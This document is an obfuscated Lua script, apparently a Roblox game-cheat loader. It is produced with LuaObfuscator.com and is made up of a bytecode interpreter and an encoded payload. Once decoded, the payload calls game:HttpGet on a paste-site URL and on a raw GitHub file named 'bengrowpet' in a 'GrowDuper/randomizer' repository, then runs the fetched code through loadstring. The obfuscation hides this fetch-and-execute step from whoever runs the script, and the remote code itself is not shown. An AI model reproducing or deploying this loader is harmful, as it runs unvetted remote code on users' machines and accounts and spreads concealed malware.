--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v107=v5(v86,v19);v19=nil;return v107;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -(1 + 0)))) + (620 -(555 + 64)))) ;return v87-(v87%1) ;else local v88=(933 -(135 + 722 + 74))^(v32-(569 -((1244 -(282 + 595)) + 201))) ;return (((v31%(v88 + v88))>=v88) and 1) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1024 + 20)) );v18=v18 + 4 ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(32 + 85))) + (v38 * (57 + 199)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=958 -(892 + (142 -77)) ;local v44=(v20(v42,2 -1 ,36 -16 ) * ((1 + 1)^(58 -26))) + v41 ;local v45=v20(v42,371 -((154 -67) + 263) ,31);local v46=((v20(v42,212 -(67 + 113) )==1) and  -(1 + 0)) or (2 -(1 + 0)) ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (952 -(802 + 150)) ;else local v108=0 -0 ;while true do if (v108==(0 -0)) then v45=1 + 0 ;v43=0;break;end end end elseif (v45==(3044 -(915 + (873 -(368 + 423))))) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1344 -321) ) * (v43 + (v44/((1189 -(1069 + 118))^(117 -65)))) ;end local function v25(v47) local v48=18 -(10 + 8) ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then local v116=442 -(416 + 26) ;while true do if (v116==(1138 -(116 + 1022))) then v47=v23();if (v47==(0 -0)) then return "";end break;end end end v48=1 + 0 + 0 ;end if (v48==(2 + 1)) then return v6(v50);end if (v48==(3 -(1 + 0))) then v50={};for v109=439 -(145 + 293) , #v49 do v50[v109]=v2(v1(v3(v49,v109,v109)));end v48=3;end if (v48==((1316 -(261 + 624)) -((77 -33) + 386))) then v49=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;v48=1488 -(998 + 488) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96,v97) local v98=(function() return 0 + 0 ;end)();local v89=(function() return;end)();local v90=(function() return;end)();while true do local v106=(function() return 202 -(14 + 188) ;end)();while true do if (v106==(675 -(534 + 141))) then if ((1 -0)~=v98) then else local v119=(function() return 0 -0 ;end)();while true do if (v119==(0 + 0)) then while true do if (v89~=(1636 -(1373 + 263))) then else v90=(function() return v91();end)();if (v92(v90, #"!", #">")==0) then local v170=(function() return 0 + 0 ;end)();local v171=(function() return;end)();local v172=(function() return;end)();local v173=(function() return;end)();while true do if (v170==(1002 -(451 + 549))) then if (v92(v172, #"\\", #"{")~= #"]") then else v173[2]=(function() return v95[v173[1 + 1 ]];end)();end if (v92(v172,2 + 0 ,2 -0 )== #",") then v173[ #"xnx"]=(function() return v95[v173[ #"nil"]];end)();end v170=(function() return 3;end)();end if (v170==(1 + 0)) then local v176=(function() return 0;end)();while true do if (v176==(1 -0)) then v170=(function() return 2 -0 ;end)();break;end if ((0 -0)~=v176) then else v173=(function() return {v93(),v93(),nil,nil};end)();if (v171==(0 + 0)) then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==(0 + 0)) then v184=(function() return 396 -(115 + 281) ;end)();while true do if (v184==(0 + 0)) then v173[ #"19("]=(function() return v93();end)();v173[ #"?id="]=(function() return v93();end)();break;end end break;end end elseif (v171== #">") then v173[ #"-19"]=(function() return v94();end)();elseif (v171==(562 -(306 + 254))) then v173[ #"19("]=(function() return v94() -((4 -2)^(1 + 15)) ;end)();elseif (v171~= #"19(") then else local v189=(function() return 0 + 0 ;end)();local v190=(function() return;end)();while true do if (v189~=0) then else v190=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v190) then else v173[ #"-19"]=(function() return v94() -(2^(38 -22)) ;end)();v173[ #"?id="]=(function() return v93();end)();break;end end break;end end end v176=(function() return 868 -(550 + 317) ;end)();end end end if (v170==(603 -(268 + 335))) then local v177=(function() return 290 -(60 + 230) ;end)();while true do if (v177~=0) then else local v182=(function() return 0 -0 ;end)();while true do if (v182==(0 -0)) then v171=(function() return v92(v90,1 + 1 , #"-19");end)();v172=(function() return v92(v90, #".dev",6);end)();v182=(function() return 2 -1 ;end)();end if (v182==(286 -(134 + 151))) then v177=(function() return 812 -(569 + 242) ;end)();break;end end end if (v177==(1666 -(970 + 695))) then v170=(function() return 1;end)();break;end end end if (v170~=(1 + 2)) then else if (v92(v172, #"19(", #"xxx")== #"!") then v173[ #"0313"]=(function() return v95[v173[ #"0313"]];end)();end v96[v97]=(function() return v173;end)();break;end end end break;end end return v89,v90,v91,v92,v93,v94,v95,v96,v97;end end end if (v98==(1024 -(706 + 318))) then local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120==(0 -0)) then v121=(function() return 1271 -(945 + 326) ;end)();while true do if (v121~=(1990 -(582 + 1408))) then else v89=(function() return 0 -0 ;end)();v90=(function() return nil;end)();v121=(function() return 1;end)();end if ((1 -0)==v121) then v98=(function() return 3 -2 ;end)();break;end end break;end end end break;end end end end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 700 -(271 + 429) ;end)();local v103=(function() return;end)();while true do if (v102~=(1824 -(1195 + 629))) then else v103=(function() return 0 -0 ;end)();while true do if (v103==(0 + 0)) then local v122=(function() return 241 -(187 + 54) ;end)();while true do if (v122~=0) then else v99[v100-#":" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #"\\",v57 do local v67=(function() return 780 -(162 + 618) ;end)();local v68=(function() return;end)();local v69=(function() return;end)();while true do if (v67==(1 + 0)) then if (v68== #"|") then v69=(function() return v21()~=0 ;end)();elseif (v68==(2 + 0)) then v69=(function() return v24();end)();elseif (v68~= #"91(") then else v69=(function() return v25();end)();end v58[v66]=(function() return v69;end)();break;end if (v67==0) then v68=(function() return v21();end)();v69=(function() return nil;end)();v67=(function() return 1;end)();end end end v56[ #"xnx"]=(function() return v21();end)();for v70= #" ",v23() do FlatIdent_44839,Descriptor,v21,v20,v22,v23,v58,v53,v70=(function() return v51(FlatIdent_44839,Descriptor,v21,v20,v22,v23,v58,v53,v70);end)();end for v71= #"]",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1172 -(418 + 753) ];local v64=v60[1 + 1 ];local v65=v60[(2 -1) + 2 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1 + 0 ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(530 -(406 + 123)) ;local v81={};local v82={};for v104=1769 -(1749 + 20) ,v80 do if ((518<902) and (v104>=v74)) then v78[v104-v74 ]=v79[v104 + 1 + 0 ];else v82[v104]=v79[v104 + (1323 -((2796 -1547) + 73)) ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v105=0;while true do if (v105==(1 + 0)) then if (v85<=(1149 -(466 + 679))) then if ((2994>858) and (v85<=1)) then if (v85>0) then local v124=v84[2];local v125=v82[v84[6 -3 ]];v82[v124 + (2 -1) ]=v125;v82[v124]=v125[v84[1904 -(106 + 1794) ]];else v76=v84[1 + 2 ];end elseif (v85<=(1 + 1 + 0)) then do return;end elseif (v85>(8 -5)) then v82[v84[5 -3 ]]=v62[v84[117 -(4 + 110) ]];else v82[v84[586 -(57 + 527) ]]=v84[3];end elseif (v85<=(1434 -(41 + 1386))) then if ((v85<=((521 -413) -(17 + 86))) or (3755<=915)) then v82[v84[2 + 0 ]]=v84[6 -3 ]~=(0 -0) ;elseif ((3946>3743) and (v85>(172 -((875 -(239 + 514)) + 44)))) then local v135;local v136,v137;local v138;local v139;v82[v84[2 -0 ]]=v62[v84[9 -6 ]];v76=v76 + 1 + 0 ;v84=v72[v76];v139=v84[2 + 0 ];v138=v82[v84[3]];v82[v139 + (1330 -(797 + 532)) + 0 + 0 ]=v138;v82[v139]=v138[v84[7 -3 ]];v76=v76 + (66 -(30 + 12 + 23)) ;v84=v72[v76];v82[v84[2 + 0 ]]=v84[1260 -((2451 -1408) + 214) ];v76=v76 + (3 -2) ;v84=v72[v76];v82[v84[1214 -(323 + 889) ]]=v84[7 -4 ]~=(580 -(361 + 219)) ;v76=v76 + 1 ;v84=v72[v76];v139=v84[2];v136,v137=v75(v82[v139](v13(v82,v139 + (321 -(53 + 267)) ,v84[(1203 -(373 + 829)) + 2 ])));v77=(v137 + v139) -(414 -(15 + 398)) ;v135=982 -(18 + 964) ;for v164=v139,v77 do local v165=0;while true do if (v165==(0 -0)) then v135=v135 + 1 ;v82[v164]=v136[v135];break;end end end v76=v76 + 1 ;v84=v72[v76];v139=v84[2 + 0 ];v82[v139]=v82[v139](v13(v82,v139 + 1 + 0 ,v77));v76=v76 + 1 ;v84=v72[v76];v82[v84[852 -(20 + 830) ]]();v76=v76 + (732 -(476 + 255)) ;v84=v72[v76];v82[v84[2 + 0 ]]=v62[v84[129 -(116 + 10) ]];v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[2]]=v62[v84[741 -(542 + 196) ]];v76=v76 + (1 -0) ;v84=v72[v76];v139=v84[1 + 1 ];v138=v82[v84[3]];v82[v139 + 1 + 0 ]=v138;v82[v139]=v138[v84[2 + (1132 -(369 + 761)) ]];else local v158=v84[4 -2 ];v82[v158]=v82[v158](v13(v82,v158 + ((2 + 0) -1) ,v77));end elseif (v85<=8) then v82[v84[1553 -(1126 + 425) ]]();elseif (v85>(414 -(118 + 287))) then local v160=v84[7 -5 ];local v161,v162=v75(v82[v160](v13(v82,v160 + (1122 -(118 + 1003)) ,v84[8 -5 ])));v77=(v162 + v160) -(378 -(142 + 235)) ;local v163=0;for v166=v160,v77 do v163=v163 + (4 -(5 -2)) ;v82[v166]=v161[v163];end elseif (v82[v84[1 + 1 ]]==v84[981 -((1047 -494) + 424) ]) then v76=v76 + (1 -0) ;else v76=v84[3 + (238 -(64 + 174)) ];end v76=v76 + 1 + 0 + 0 ;break;end if ((v105==(0 + 0)) or (1335>=3306)) then v84=v72[v76];v85=v84[(1 -0) + 0 ];v105=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F4D7241485A4357456159436A4B7434692F72617703513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F47726F7744757065722F72616E646F6D697A65722F726566732F68656164732F6D61696E2F62656E67726F7770657400153Q0012033Q00013Q0026093Q00010001000100044Q00010001001204000100023Q001207000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001203000400064Q000A000200044Q000600013Q00022Q000800010001000100044Q0014000100044Q000100012Q00023Q00017Q00",v9(),...);
